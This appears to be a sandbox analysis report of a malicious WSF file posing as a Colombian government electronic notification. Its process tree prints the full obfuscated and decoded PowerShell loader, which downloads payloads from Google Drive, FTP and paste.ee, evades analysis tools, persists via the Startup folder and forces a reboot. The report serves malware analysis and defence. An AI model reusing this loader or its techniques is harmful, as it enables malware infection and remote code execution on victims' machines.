'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2084
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Drops startup file
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1332
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:2864
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3100
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    PID:1312
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 